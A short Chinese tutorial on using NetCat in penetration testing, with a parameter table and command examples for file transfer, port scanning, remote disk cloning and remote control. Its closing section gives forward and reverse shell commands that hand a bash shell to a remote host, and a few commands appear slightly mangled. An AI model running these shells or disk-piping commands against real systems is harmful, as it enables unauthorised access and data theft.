NetCat(NC)在渗透测试中的常见应用以及中文版参数解释

NetCat简称NC，是一款体积小巧但功能十分强大的网络工具，享有网络工具中的“瑞士军刀”之称，深得网络安全从业者的喜爱，在此我总结以下NetCat在渗透测试和部分其他情景下的使用方法：
1.作为文本传输工具
2.作为文件的传输工具
3.加密传输文件
4.加密数据流量
5.远程克隆硬盘
6.作为木马进行远程控制
7.作为流媒体服务器

参数中文对照
-d 后台模式
-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point[s], upto 8
-G num source-routing pointer: 4, 8, 12,...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时
端口的表示法可写为M-N的范围格式。
NC-传输文本信息
A:nc -l -p 6666
B:nc -nv 1.1.1.1 6666
 
More Lsof
NC传输文件和目录
传输文件
A: nc -lp 333 > 1.txt
B: nc -nv 1.1.1.1 <1.txt
或者：
A: nc -lp 333 < 1.txt
B: nc -nv 1.1.1.1 >1.txt
传输目录
A:tar -cvf - music/ | nc -lp 333
B:nc -nv 1.1.1.1 333 | tar -xvf
传输加密文件
A:nc -lp 333 | mcrypt --flush -Fbqd -arjindael256 -m ecb >1.txt
B:mcrypt –flush -Fbq -a rjindael256 -m ecb| nc -nv 1.1.1.1 333
 
NC-流媒体服务
A:cat 1.mp4 | nc -lp 333
B: nc -nv 1.1.1.1 333 | mplayer -vo x11-cache 3000-
 
NC-端口扫描
nc -nvz 1.1.1.1 1-65535
nc -vnzu 1.1.1.1 1-1024
 
NC-远程克隆硬盘
A: nc -lp 333 | dd of=/dev/sda
B:dd if=/dev/sda |nc -nv 1.1.1.1 333
NC-远程控制
正向:
A:nc -lp 333 -c bash
B:nc 1.1.1.1 333
反向:
A: nc -lp 333
B: nc 1.1.1.1 333 -c bash